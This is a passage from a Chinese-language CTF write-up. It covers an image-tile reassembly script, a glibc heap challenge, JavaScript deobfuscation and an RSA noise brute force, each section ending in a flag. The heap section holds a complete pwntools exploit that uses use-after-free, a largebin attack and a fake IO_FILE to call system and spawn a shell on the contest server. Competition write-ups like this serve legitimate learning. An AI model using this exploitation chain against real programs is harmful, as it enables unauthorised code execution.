<em>else<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(f\"Failed to find quadrant {i+1}\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>break<\/em><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; <em>if<\/em>&nbsp;&nbsp; len(quadrants) == 4:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"Found all 4 quadrants!\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; save_result(quadrants)<br>&nbsp;&nbsp;&nbsp; <em>else<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"Could not solve all.\")<br>&nbsp;<br>def <strong>save_result<\/strong>(<em>quadrants<\/em>):<br>&nbsp;&nbsp;&nbsp; ordered_quads&nbsp;&nbsp; = [None] * 4<br>&nbsp;&nbsp;&nbsp; def <strong>has_finder<\/strong>(<em>filename<\/em>):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; img = Image.open(<em>filename<\/em>).convert('L')<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em>&nbsp;&nbsp; img.getpixel((50,50)) == 0<br>&nbsp;&nbsp;&nbsp; tile_size =&nbsp;&nbsp; 100<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; full_img =&nbsp;&nbsp; Image.new('RGB', (800, 800))<br>&nbsp;&nbsp;&nbsp; <em>for<\/em> i,&nbsp;&nbsp; quad <em>in<\/em> enumerate(<em>quadrants<\/em>):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; q_img = Image.new('RGB', (400, 400))<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>for<\/em>&nbsp;&nbsp; idx, f <em>in<\/em> enumerate(quad):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; row = idx \/\/ 4<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; col = idx % 4<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tile = Image.open(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; q_img.paste(tile, (col * tile_size, row * tile_size))<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; q_img.save(f'quadrant_{i}.png')<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"Saved quadrant_0.png to quadrant_3.png\")<br>&nbsp;<br><em>if<\/em> __name__ ==&nbsp;&nbsp; \"__main__\":<br>&nbsp;&nbsp;&nbsp; solve()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{4a154507-ba7d-3f79-8739-91533b2bafc7}<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">\u9898\u76ee\u5341 \u4e0d\u6253CTF\u6216\u8bb8\u5979\u8fd8\u5728<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>\u4e0d\u6253CTF\u6216\u8bb8\u6211\u5c31\u4e0d\u4f1a\u5931\u53bb\u5979\uff0c\u53ea\u602a\u5f53\u5e74\u6c89\u8ff7CTF\u4e0d\u53bb\u966a\u5979\uff0c\u540e\u6765\u8d8a\u6765\u8d8a\u758f\u8fdc\ud83d\ude2d\uff0c\u7ed9\u4e86\u4e2aLIBC\u7684\u5806\u9898\uff0c\u4e0d\u80fd\u7528tcache\uff0c\u90a3\u5c31\u76f4\u63a5UAF\u7ed9largebin\u548cIO-FILE\uff0c\u5728\u83dc\u5355\u91cc\u9762\u7533\u8bf7\u591a\u4e2alarge chunk\u7136\u540e\u91ca\u653e\u5176\u4e2d\u4e00\u4e2a\uff0c\u8fd9\u4e2a\u65f6\u5019\u6307\u9488\u4f1a\u6307\u5411main\u9644\u8fd1<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=ZGE0Mzg4MGEzOWVkYWIyZWUzMDc2YzZmYWRmN2JmMTZfTklTTDlKRW5FNmdnWEZzZ2RKY3dkdzVOQmlEcXlsNlNfVG9rZW46RElSbWJvWHVQbzBZTVB4R1VDbWM3cGZLbkVmXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u914d\u5408\u7ed9\u7684libc\u53ef\u4ee5\u76f4\u63a5\u6cc4\u9732\u51fa\u6765libc\u57fa\u5740\uff0c\u7136\u540e\u5728\u7528UAF\u7ee7\u7eed\u5199\u5165\u56fa\u5b9a\u6807\u8bb0\u7ed9show\u53cd\u63a8heap\u8d77\u70b9\u62ff\u5230\u5047IO_FILE\uff0c\u91ca\u653e\u4e00\u4e2alarge chunk\u8fdb\u5165largebin\u4fee\u6539bk_nextsieze\u4e4b\u540e\u628a\u4e0b\u4e00\u6b21malloc\u7684\u5730\u5740\u5199\u5230\u6211\u4eec\u9700\u8981\u7684fake IO_FILE\u5730\u5740\u5c31\u53ef\u4ee5\u4e86\uff0c\u53ea\u8981\u6ee1\u8db3\u68c0\u67e5\u5c31\u80fd\u76f4\u63a5\u8df3\u8f6c\u5230system\uff0c\u6700\u540e\u641clibc\u7684\/bin\/sh\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=NTIyNzlkOWJhMjE1ZWY1NDc2OTg4N2FhZGE4NWJiMzlfRHRKb2ZtT0E3V2hLcjJiZVBXbmxzNUZrckZTVkJVbmhfVG9rZW46V3gyNGIwb3ljb1FFVjZ4SmFxMGNRbmFZbnFhXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5982\u8be5\u9898\u4f7f\u7528\u81ea\u5df1\u7f16\u5199\u7684\u811a\u672c\u8bf7\u8be6\u7ec6\u5199\u51fa\uff0c\u4e0d\u5141\u8bb8\u622a\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>from pwn import *<br>&nbsp;<br>context.arch = 'amd64'<br>context.os&nbsp;&nbsp; = 'linux'<br>context.log_level = 'info'<br>&nbsp;<br>sf =&nbsp;&nbsp; remote(\"101.200.152.81\", 35128)<br>elf&nbsp; = ELF('.\/pwn')<br>libc = ELF('.\/libc.so.6')<br>&nbsp;<br>def step(x):<br>&nbsp;&nbsp;&nbsp; sf.sendlineafter(b'choice:\\n',&nbsp;&nbsp; str(x).encode())<br>&nbsp;<br>def arg(p):<br>&nbsp;&nbsp;&nbsp; sf.sendline(p if isinstance(p, bytes)&nbsp;&nbsp; else str(p).encode())<br>&nbsp;<br>def feed(p):<br>&nbsp;&nbsp;&nbsp; sf.sendafter(b'are your plans for the&nbsp;&nbsp; date: \\n', p)<br>&nbsp;<br>def grab(n=6):<br>&nbsp;&nbsp;&nbsp; return u64(sf.recv(n).ljust(8, b'\\x00'))<br>&nbsp;<br>def make(i, s):<br>&nbsp;&nbsp;&nbsp; step(1)<br>&nbsp;&nbsp;&nbsp; arg(i)<br>&nbsp;&nbsp;&nbsp; arg(s)<br>&nbsp;<br>def drop(i):<br>&nbsp;&nbsp;&nbsp; step(2)<br>&nbsp;&nbsp;&nbsp; arg(i)<br>&nbsp;<br>def patch(i, c):<br>&nbsp;&nbsp;&nbsp; step(3)<br>&nbsp;&nbsp;&nbsp; arg(i)<br>&nbsp;&nbsp;&nbsp; feed(c)<br>&nbsp;<br>def peek(i):<br>&nbsp;&nbsp;&nbsp; step(4)<br>&nbsp;&nbsp;&nbsp; arg(i)<br>&nbsp;<br>for i, sz in&nbsp;&nbsp; enumerate([0x430, 0x418, 0x440, 0x410]):<br>&nbsp;&nbsp;&nbsp; make(i, sz)<br>&nbsp;<br>drop(2)<br>peek(2)<br>sf.recvuntil(b'\\x7f')<br>libc_leak =&nbsp;&nbsp; u64(sf.recv(-1)[-6:].ljust(8, b'\\x00'))<br>libc_base = libc_leak -&nbsp;&nbsp; 0x219ce0 - 0x1000<br>log.success(f\"libc @&nbsp;&nbsp; {hex(libc_base)}\")<br>&nbsp;<br>IO_list = libc_base +&nbsp;&nbsp; libc.sym['_IO_list_all']<br>wjump&nbsp;&nbsp; = libc_base + libc.sym['_IO_wfile_jumps']<br>syscall = libc_base +&nbsp;&nbsp; libc.sym['system']<br>&nbsp;<br>make(4, 0x450)<br>patch(2, b'B'*0x10)<br>peek(2)<br>sf.recvuntil(b'B'*0x10)<br>heap_base = grab() - 0xaf0<br>log.success(f\"heap @&nbsp;&nbsp; {hex(heap_base)}\")<br>&nbsp;<br>drop(0)<br>patch(2, flat(0, 0,&nbsp;&nbsp; 0,IO_list - 0x20))<br>&nbsp;<br>make(5, 0x450)<br>make(0, 0x430)<br>&nbsp;<br>arena_ptr = libc_base +&nbsp;&nbsp; 0x21b0e0<br>patch(2, flat(arena_ptr,&nbsp;&nbsp; arena_ptr,heap_base + 0xaf0,heap_base + 0xaf0))<br>make(2, 0x440)<br>&nbsp;<br>fake = heap_base + 0xaf0<br>cmd&nbsp; = fake + 0x2a0<br>lock = heap_base + 0x6c0<br>wide = fake + 0xe0<br>chain= wide + 0xe8<br>&nbsp;<br>blocks = [<br>&nbsp;&nbsp;&nbsp; (0x00, p64(0)*2),<br>&nbsp;&nbsp;&nbsp; (0x10, p64(0) + p64(-1 &amp;&nbsp;&nbsp; 0xffffffffffffffff)),<br>&nbsp;&nbsp;&nbsp; (0x28, p64(0)*3 + p64(cmd)),<br>&nbsp;&nbsp;&nbsp; (0x50, p64(0)*7),<br>&nbsp;&nbsp;&nbsp; (0x88, p64(lock)),<br>&nbsp;&nbsp;&nbsp; (0xa0, p64(0)*2 + p64(wide)),<br>&nbsp;&nbsp;&nbsp; (0xc8, p64(0)*5),<br>&nbsp;&nbsp;&nbsp; (0xf8, p64(wjump)),<br>&nbsp;&nbsp;&nbsp; (0x1d8, p64(chain)),<br>&nbsp;&nbsp;&nbsp; (0x250, p64(syscall)),<br>]<br>&nbsp;<br>payload = bytearray(b'\\x00'&nbsp;&nbsp; * 0x300)<br>for off, data in blocks:<br>&nbsp;&nbsp;&nbsp; payload[off:off+len(data)] = data<br>&nbsp;<br>patch(2, bytes(payload))<br>&nbsp;<br>patch(1, b'A'*0x410 +&nbsp;&nbsp; p32(0xfffff7f5) + b';sh\\x00')<br>&nbsp;<br>step(5)<br>sf.interactive()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{dd975c31-c7f0-4d14-8799-c4f82846d268}<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">\u9898\u76ee\u5341\u4e00 \u82f1\u52c7\u6295\u5f39\u624b<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>\u538b\u7f29\u5305\u5bc6\u7801\u662f\u4eba\u6211\u5403 CyhUkh8a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=MDJlMDlmZDVjMmQ3MzAyYzI1ZTM0ZmVkYTQ5ZTA3MDhfQVc0MnRFWm01c2ttaUFxOFQzcmF3YW0xbGxvSlBWQzhfVG9rZW46WlhqYmJjOURZb0pDTk14aE5aTmNIZ1JHbm9lXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u9006\u5411core.js\u62ff\u5230\u5bf9\u5e94\u7684\u5bc6\u6587\u548c\u903b\u8f91\uff0c\u6838\u5fc3\u903b\u8f91\u662f\u5982\u56fe\u8fd9\u4e00\u5768\uff0c\u628a\u4ed6\u91cd\u7f6e\u6210\u4e00\u4e2a\u53ef\u4ee5\u89e3\u5bc6\u7684\u811a\u672c\u4e4b\u540e\u5199\u4e2ajs\u811a\u672c\u5c31\u80fd\u89e3\u51fa\u6765\u539f\u6587<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=ODNmMGMzODczY2Q3MmEwYjdjMzY5MTVlYTIzNjI2ZDVfM3YxaFZFS3YwQkVxbFUyeWEwa0JxVEZKanFFUFVOQnNfVG9rZW46VWdGVmJBTlc4b0s2NlF4SG9yc2NROHl6bkVoXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5982\u8be5\u9898\u4f7f\u7528\u81ea\u5df1\u7f16\u5199\u7684\u811a\u672c\u8bf7\u8be6\u7ec6\u5199\u51fa\uff0c\u4e0d\u5141\u8bb8\u622a\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>function _0x2f3d() {<br>&nbsp;&nbsp;&nbsp; const _0x239d05 = [<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; '3088265aLnAAu',&nbsp;&nbsp; '873bf00c57', '25372BhvWzP', '7c3f7bbf99',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'gFKKr', '821466gZMlek',&nbsp;&nbsp; '2569812BGsTZj', 'HPqhV',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; '4040648FCWnre',&nbsp;&nbsp; '76849b468b', '1006744yccwII', '25COywAc',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; '1304166xohEjZ'<br>&nbsp;&nbsp;&nbsp; ];<br>&nbsp;&nbsp;&nbsp; _0x2f3d = function () { return _0x239d05;&nbsp;&nbsp; };<br>&nbsp;&nbsp;&nbsp; return _0x2f3d();<br>}<br>(function (<em>_0x308471<\/em>, <em>_0x5643fe<\/em>) {<br>&nbsp;&nbsp;&nbsp; const _0x5a606a = _0x2460, _0x33a4a5 =&nbsp;&nbsp; _0x308471();<br>&nbsp;&nbsp;&nbsp; while (!![]) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; try {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; const&nbsp;&nbsp; _0x2afb4f = parseInt(_0x5a606a(0x1b3)) \/ 1 * (-parseInt(_0x5a606a(0x1b7)) \/&nbsp;&nbsp; 2) + ...;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (_0x2afb4f&nbsp;&nbsp; === _0x5643fe) break;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; else&nbsp;&nbsp; _0x33a4a5['push'](_0x33a4a5['shift']());<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; } catch (_0x5220d0) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _0x33a4a5['push'](_0x33a4a5['shift']());<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp; }<br>}(_0x2f3d, 0xc368f));<br>function _0x2460(<em>_0x111017<\/em>, <em>_0x5efafa<\/em>) {<br>&nbsp;&nbsp;&nbsp; const _0x2f1f50 = _0x2f3d();<br>&nbsp;&nbsp;&nbsp; return _0x2460 = function (<em>_0x2f7d39<\/em>,&nbsp;&nbsp; <em>_0x466e46<\/em>) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _0x2f7d39 = _0x2f7d39 -&nbsp;&nbsp; 0x1b3;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; let _0x2b3801 =&nbsp;&nbsp; _0x2f1f50[_0x2f7d39];<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return _0x2b3801;<br>&nbsp;&nbsp;&nbsp; }, _0x2460(_0x111017, _0x5efafa);<br>}<br>const _0x47b80f = _0x2460;<br>const part1 = _0x47b80f(0x1b6); <em>\/\/ '873bf00c57'<\/em><br>const part2 = _0x47b80f(0x1b8); <em>\/\/ '7c3f7bbf99'<\/em><br>const part3 = _0x47b80f(0x1be); <em>\/\/ '76849b468b'<\/em><br>const flag = part1 + part2 + part3 + 'a3';<br>&nbsp;<br>console.log(flag);<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{873bf00c577c3f7bbf9976849b468ba3}<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">\u9898\u76ee\u5341\u4e8c Quantum<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>\u53cc\u53c2\u6570\u566a\u58f016-bit \u566a\u58f0\uff1a0 &lt;= r &lt; 2^16\u3002<br>public.txt \u2192 \u5f97\u5230 (N, e)<br>ciphertext.txt \u2192 \u5f97\u5230 c \uff08\u83b7\u53d6\u76ee\u6807\u5bc6\u6587\uff09<br>\u5728 oracle_transcript.txt \u4e2d\u67e5\u627e c \u5bf9\u5e94\u7684 y \uff08 \u83b7\u53d6 Oracle \u6cc4\u9732\u7684 y = m + r\uff09<br>\u679a\u4e3e r = 0 \u5230 65535 \uff08\u66b4\u529b\u731c\u6d4b\u566a\u58f0\uff09<br>\u8ba1\u7b97 m = y - r\uff0c\u9a8c\u8bc1 m^e mod N == c \u627e\u5230\u771f\u5b9e\u7684\u660e\u6587 m<br>\u7136\u540e\u7f16\u5199python\u4ee3\u7801 \u6267\u884c<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=NWEwOGRmNmZkMzBhYzViNzQ5YjQ2YjU0N2QzNDI0MzRfZno5aU9wcEVrR1NWRHEzRml1MzZBaVZNa2x1YVNJRXhfVG9rZW46Wm5NOGI5WUNIb3VtMTB4dnNsTmN1NkJxbjhnXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5982\u8be5\u9898\u4f7f\u7528\u81ea\u5df1\u7f16\u5199\u7684\u811a\u672c\u8bf7\u8be6\u7ec6\u5199\u51fa\uff0c\u4e0d\u5141\u8bb8\u622a\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>from pathlib import Path<br>&nbsp;<br>def strip_hex_prefix(s: str)&nbsp;&nbsp; -&gt; str:<br>&nbsp;&nbsp;&nbsp; s = s.strip().lower()<br>&nbsp;&nbsp;&nbsp; if s.startswith(\"0x\"):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return s[2:]<br>&nbsp;&nbsp;&nbsp; return s<br>&nbsp;<br>def main():<br>&nbsp;&nbsp;&nbsp; # === 1. \u8bfb\u53d6\u516c\u94a5 (N, e) ===<br>&nbsp;&nbsp;&nbsp; pub_lines =&nbsp;&nbsp; Path(\"public.txt\").read_text().strip().splitlines()<br>&nbsp;&nbsp;&nbsp; if len(pub_lines) &lt; 2:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; raise ValueError(\"public.txt \u81f3\u5c11\u9700\u8981\u4e24\u884c\uff1aN \u548c e\")<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; N = int(strip_hex_prefix(pub_lines[0]),&nbsp;&nbsp; 16)<br>&nbsp;&nbsp;&nbsp; e = int(strip_hex_prefix(pub_lines[1]),&nbsp;&nbsp; 16)<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; # === 2. \u8bfb\u53d6\u76ee\u6807\u5bc6\u6587 c ===<br>&nbsp;&nbsp;&nbsp; c_hex_raw =&nbsp;&nbsp; Path(\"ciphertext.txt\").read_text().strip()<br>&nbsp;&nbsp;&nbsp; c_hex = strip_hex_prefix(c_hex_raw)<br>&nbsp;&nbsp;&nbsp; c = int(c_hex, 16)<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; # === 3. \u5728 Oracle transcript \u4e2d\u67e5\u627e y ===<br>&nbsp;&nbsp;&nbsp; y = None<br>&nbsp;&nbsp;&nbsp; transcript_path =&nbsp;&nbsp; Path(\"oracle_transcript.txt\")<br>&nbsp;&nbsp;&nbsp; for line_num, line in&nbsp;&nbsp; enumerate(transcript_path.read_text().splitlines(), start=1):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; line = line.strip()<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if not line or&nbsp;&nbsp; line.startswith(\"#\"):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; continue<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; parts = line.split()<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if len(parts) != 2:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(f\"\u8b66\u544a\uff1a\u8df3\u8fc7 oracle_transcript.txt \u7b2c {line_num} \u884c\uff08\u683c\u5f0f\u9519\u8bef\uff09: {line}\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; continue<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; a, b = parts<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; a_clean = strip_hex_prefix(a)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if a_clean == c_hex:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; y = int(strip_hex_prefix(b), 16)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; if y is None:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; raise RuntimeError(\"\u5728 oracle_transcript.txt \u4e2d\u672a\u627e\u5230\u4e0e ciphertext.txt \u5339\u914d\u7684\u6761\u76ee\")<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; # === 4. \u7206\u7834 16-bit \u566a\u58f0 r \u2208 [0, 65535] ===<br>&nbsp;&nbsp;&nbsp; print(f\"\u6b63\u5728\u7206\u7834 16-bit \u566a\u58f0 (r \u2208 [0,&nbsp;&nbsp; {1&lt;&lt;16}))...\")<br>&nbsp;&nbsp;&nbsp; ans_m = None<br>&nbsp;&nbsp;&nbsp; ans_r = None<br>&nbsp;&nbsp;&nbsp; max_r = 1 &lt;&lt; 16&nbsp; # 65536<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; for r in range(max_r):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if r &gt; y:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; continue<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; m = y - r<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if pow(m, e, N) == c:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ans_m = m<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ans_r = r<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; if ans_m is None:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; raise RuntimeError(f\"\u5728 r \u2208 [0, {max_r}) \u8303\u56f4\u5185\u672a\u627e\u5230\u6709\u6548\u660e\u6587\u3002\u5efa\u8bae\u5c1d\u8bd5\u66f4\u5927\u8303\u56f4\uff08\u5982 20-bit\uff09\")<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; byte_len = max(1, (ans_m.bit_length() +&nbsp;&nbsp; 7) \/\/ 8)<br>&nbsp;&nbsp;&nbsp; m_bytes = ans_m.to_bytes(byte_len,&nbsp;&nbsp; \"big\")<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; print(f\"\\n\u2705 \u6210\u529f\u6062\u590d\u660e\u6587\uff01\")<br>&nbsp;&nbsp;&nbsp; print(f\"r = {ans_r}&nbsp;&nbsp; (0x{ans_r:x})\")<br>&nbsp;&nbsp;&nbsp; print(f\"\u660e\u6587\u957f\u5ea6: {len(m_bytes)} \u5b57\u8282\")<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; try:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; plain_str =&nbsp;&nbsp; m_bytes.decode(\"utf-8\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(f\"\\n--- UTF-8 \u89e3\u7801\u7ed3\u679c ---\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(plain_str)<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; except UnicodeDecodeError:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(f\"\\n--- \u539f\u59cb\u5b57\u8282 (hex) ---\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(m_bytes.hex())<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"\\n--- \u5341\u516d\u8fdb\u5236\u9884\u89c8\uff08\u6bcf\u884c32\u5b57\u8282\uff09 ---\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for i in range(0, len(m_bytes), 32):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; chunk = m_bytes[i:i+32]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hex_part = \"&nbsp;&nbsp; \".join(f\"{b:02x}\" for b in chunk)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ascii_part =&nbsp;&nbsp; \"\".join(chr(b) if 32 &lt;= b &lt;= 126 else \".\" for b in&nbsp;&nbsp; chunk)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(f\"{i:04x}:&nbsp;&nbsp; {hex_part:&lt;48} | {ascii_part}\")<br>&nbsp;<br>if __name__ ==&nbsp;&nbsp; \"__main__\":<br>&nbsp;&nbsp;&nbsp; main()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 